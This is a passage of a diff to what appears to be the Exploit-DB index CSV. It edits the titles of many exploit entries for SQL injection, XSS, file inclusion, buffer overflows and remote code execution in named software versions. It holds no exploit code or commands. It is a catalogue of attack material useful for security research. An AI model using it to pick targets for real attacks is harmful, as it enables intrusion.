Open Source 4.6.2 administrator/popups/index3pop.php mosConfig_sitename Parameter XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - mambots/editors/mostlyce/ php/connector.php Query String XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 -32256,platforms/windows/dos/32256.py,"Ipswitch <= 8.0 WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 +32256,platforms/windows/dos/32256.py,"Ipswitch 8.0 WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 32257,platforms/php/webapps/32257.txt,"PromoProducts 'view_product.php' Multiple SQL Injection Vulnerabilities",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'awstats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29107,12 +29107,12 @@ id,file,description,date,author,platform,type,port 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection",2008-08-20,"Hussin X",php,webapps,0 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure",2008-06-19,"Charalambous Glafkos",php,webapps,0 -32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Include",2008-08-21,"Beenu Arora",php,webapps,0 +32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Inclusion",2008-08-21,"Beenu Arora",php,webapps,0 32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0 -32289,platforms/linux/remote/32289.txt,"Vim <= 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0 +32289,platforms/linux/remote/32289.txt,"Vim 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0 32290,platforms/php/webapps/32290.txt,"Accellion File Transfer - Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps,0 32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 - Search Cross-Site Scripting",2008-08-22,"Tyler Trioxide",php,webapps,0 -32292,platforms/linux/dos/32292.rb,"Ruby <= 1.9 REXML Remote Denial Of Service",2008-08-23,"Luka Treiber",linux,dos,0 +32292,platforms/linux/dos/32292.rb,"Ruby 1.9 REXML Remote Denial Of Service",2008-08-23,"Luka Treiber",linux,dos,0 32293,platforms/php/webapps/32293.txt,"One-News Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",windows,dos,0 32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 - 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0 @@ -29123,7 +29123,7 @@ id,file,description,date,author,platform,type,port 32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 - 'search.asp' Cross-Site Scripting",2008-08-26,JoCk3r,asp,webapps,0 32301,platforms/windows/remote/32301.py,"Kyocera Mita Scanner File Utility 3.3.0.1 File Transfer Directory Traversal",2008-08-26,"Seth Fogie",windows,remote,0 32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 - 'adv_cat.php' Cross-Site Scripting",2008-08-27,"Bug Researchers Group",php,webapps,0 -32303,platforms/linux/remote/32303.txt,"Mono <= 2.0 - 'System.Web' HTTP Header Injection",2008-08-20,"Juraj Skripsky",linux,remote,0 +32303,platforms/linux/remote/32303.txt,"Mono 2.0 - 'System.Web' HTTP Header Injection",2008-08-20,"Juraj Skripsky",linux,remote,0 32304,platforms/linux/dos/32304.txt,"Red Hat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",linux,dos,0 32305,platforms/hardware/dos/32305.txt,"Dreambox Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",hardware,dos,0 32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 @@ -29150,7 +29150,7 @@ id,file,description,date,author,platform,type,port 32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal SEH Exploit (Metasploit)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 -32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0 +32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0 32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 @@ -29166,18 +29166,18 @@ id,file,description,date,author,platform,type,port 32345,platforms/windows/remote/32345.cpp,"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)",2008-09-08,Ciph3r,windows,remote,0 32346,platforms/php/webapps/32346.txt,"E-Php B2B Trading Marketplace Script 'listings.php' SQL Injection",2008-09-07,r45c4l,php,webapps,0 32347,platforms/php/webapps/32347.txt,"UBB.threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0 -32348,platforms/linux/dos/32348.txt,"MySQL <= 6.0.4 - Empty Binary String Literal Remote Denial Of Service",2008-03-28,"Kay Roepke",linux,dos,0 +32348,platforms/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial Of Service",2008-03-28,"Kay Roepke",linux,dos,0 32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0 32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder NULL Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 -32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Include Vulnerabilities",2008-09-10,SirGod,php,webapps,0 +32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0 32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script 'applynow.php' - SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 -32353,platforms/php/webapps/32353.txt,"Horde Application Framework <= 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 +32353,platforms/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32354,platforms/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection",2008-09-10,r45c4l,php,webapps,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,Metasploit,unix,remote,22 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0 -32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 +32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection",2014-03-19,jsass,php,remote,0 32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 32361,platforms/php/webapps/32361.txt,"Nooms 1.1 - search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 32362,platforms/multiple/dos/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service",2008-09-12,"Luigi Auriemma",multiple,dos,0 @@ -29193,20 +29193,20 @@ id,file,description,date,author,platform,type,port 32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 + < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0 32381,platforms/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow",2008-09-12,0x90,multiple,dos,0 32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",multiple,remote,0 -32383,platforms/php/webapps/32383.txt,"phpMyAdmin <= 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0 +32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0 32384,platforms/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service",2007-07-20,"Jens Axboe",linux,dos,0 32385,platforms/hardware/webapps/32385.txt,"Dlink DIR-600L Hardware Version AX Firmware 1.00 - CSRF",2014-03-20,"Dhruv Shah",hardware,webapps,0 32386,platforms/multiple/dos/32386.txt,"Unreal Engine 'UnChan.cpp' Failed Assertion Remote Denial of Service",2008-09-16,"Luigi Auriemma",multiple,dos,0 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0 -32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Include",2008-09-25,Pepelux,php,webapps,0 +32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service",2008-09-25,Ciph3r,windows,dos,0 32421,platforms/php/webapps/32421.html,"FlatPress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 -32422,platforms/php/webapps/32422.txt,"Vikingboard <= 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 +32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 32423,platforms/jsp/webapps/32423.txt,"OpenNms 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 32424,platforms/jsp/webapps/32424.txt,"OpenNms 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 32425,platforms/jsp/webapps/32425.txt,"OpenNms 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow",2008-09-26,"Ruben Santamarta ",windows,remote,0 -32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Include",2008-09-26,"Br0k3n H34rT",php,webapps,0 +32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service",2008-09-26,quakerdoomer,windows,dos,0 32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 - ActiveX Control 'CanUninstall()' Buffer Overflow",2008-09-27,Satan_HackerS,windows,remote,0 32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps,0 @@ -29220,12 +29220,12 @@ id,file,description,date,author,platform,type,port 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,Metasploit,php,remote,80 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,Metasploit,hardware,remote,22 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 -32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 +32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 32445,platforms/linux/remote/32445.txt,"MySQL 5 Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",linux,remote,0 32446,platforms/linux/local/32446.txt,"Xen 3.3 XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local,0 -32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar 'v' Parameter Remote File Include",2008-09-30,Lo$er,php,webapps,0 +32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar 'v' Parameter Remote File Inclusion",2008-09-30,Lo$er,php,webapps,0 32448,platforms/java/webapps/32448.txt,"Celoxis Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0 32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0 @@ -29243,17 +29243,17 @@ id,file,description,date,author,platform,type,port 32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 -32465,platforms/windows/remote/32465.pl,"Internet Download Manager <= 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,windows,remote,0 -32466,platforms/multiple/remote/32466.html,"Mozilla Firefox <= 3.0.3 Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",multiple,remote,0 -32467,platforms/php/webapps/32467.txt,"Opera Web Browser <= 8.51 URI Redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 -32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Parameter Multiple Remote File Include Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 +32465,platforms/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,windows,remote,0 +32466,platforms/multiple/remote/32466.html,"Mozilla Firefox 3.0.3 Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",multiple,remote,0 +32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 URI Redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 +32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Parameter Multiple Remote File Inclusion Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 32469,platforms/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",hardware,remote,0 -32470,platforms/linux/remote/32470.rb,"CUPS <= 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote,0 +32470,platforms/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote,0 32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 JavaScript 'load' Function Denial of Service",2008-10-10,"Jeremy Brown",linux,dos,0 32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 Infinite Array Sort Denial of Service",2008-10-10,"Luca Carettoni",hardware,dos,0 32473,platforms/php/webapps/32473.txt,"com_jeux Joomla! Component - 'id' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps,0 -32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 - 'CREATE ANY DIRECTORY' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0 +32475,platforms/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY DIRECTORY' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0 32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote,0 32477,platforms/windows/dos/32477.py,"Windows Media Player 11.0.5721.5230 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic (.wav) Local Crash PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 @@ -29262,7 +29262,7 @@ id,file,description,date,author,platform,type,port 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - (.wav) Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0 -32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 +32520,platforms/php/webapps/32520.txt,"OpenCart 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection",2008-11-02,"Hussin X",php,webapps,0 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0 @@ -29297,7 +29297,7 @@ id,file,description,date,author,platform,type,port 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 -32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 +32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusion Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0 32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI Redirection",2008-10-23,xuanmumu,php,webapps,0 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0 @@ -29307,10 +29307,10 @@ id,file,description,date,author,platform,type,port 32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Parameter Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0 32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",multiple,remote,0 32530,platforms/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap' and '.mime.type' Files Local Code Execution",2008-11-03,"Piotr Engelking",linux,remote,0 -32531,platforms/php/webapps/32531.txt,"phpMyAdmin <= 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 -32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'include/common.php' Remote File Include",2008-10-27,Cru3l.b0y,php,webapps,0 +32531,platforms/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 +32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'include/common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0 32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injection Vulnerabilities",2008-10-27,G4N0K,php,webapps,0 -32534,platforms/unix/dos/32534.py,"Python <= 2.5.2 - 'Imageop' Module Argument Validation Buffer Overflow",2008-10-27,"Chris Evans",unix,dos,0 +32534,platforms/unix/dos/32534.py,"Python 2.5.2 - 'Imageop' Module Argument Validation Buffer Overflow",2008-10-27,"Chris Evans",unix,dos,0 32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,php,webapps,0 32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'modules/banners/click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 @@ -29329,7 +29329,7 @@ id,file,description,date,author,platform,type,port 32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0 32552,platforms/hardware/remote/32552.txt,"SonicWALL Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,hardware,remote,0 -32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 +32553,platforms/php/webapps/32553.txt,"phpWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation",2008-10-31,NeoCoderz,windows,remote,0 32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619 @@ -29339,12 +29339,12 @@ id,file,description,date,author,platform,type,port 32560,platforms/ios/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset",2014-03-27,"N B Sri Harsha",php,webapps,80 32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80 -32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 +32565,platforms/multiple/remote/32565.txt,"Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 - Cross-Site Scripting",2008-11-04,"Brad Antoniewicz",php,webapps,0 32567,platforms/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution (Metasploit)",2014-03-28,"SecPod Research",windows,remote,80 32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888 -32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include",2008-11-06,DeltahackingTEAM,php,webapps,0 +32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross-Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - Atepmon.sys IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service",2008-11-09,killprog.org,windows,dos,0 @@ -29355,7 +29355,7 @@ id,file,description,date,author,platform,type,port 32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0 32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps,0 -32581,platforms/multiple/dos/32581.txt,"Zope <= 2.11.2 PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 +32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0 @@ -29405,7 +29405,7 @@ id,file,description,date,author,platform,type,port 32629,platforms/asp/webapps/32629.txt,"ASP Forum Script default.asp Query String XSS",2008-12-01,Pouya_Server,asp,webapps,0 32630,platforms/asp/webapps/32630.txt,"Pre ASP Job Board 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32631,platforms/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,multiple,webapps,0 -32632,platforms/php/webapps/32632.php,"Fantastico 'index.php' Local File Include",2008-12-02,Super-Crystal,php,webapps,0 +32632,platforms/php/webapps/32632.php,"Fantastico 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,php,webapps,0 32633,platforms/php/webapps/32633.txt,"Z1Exchange 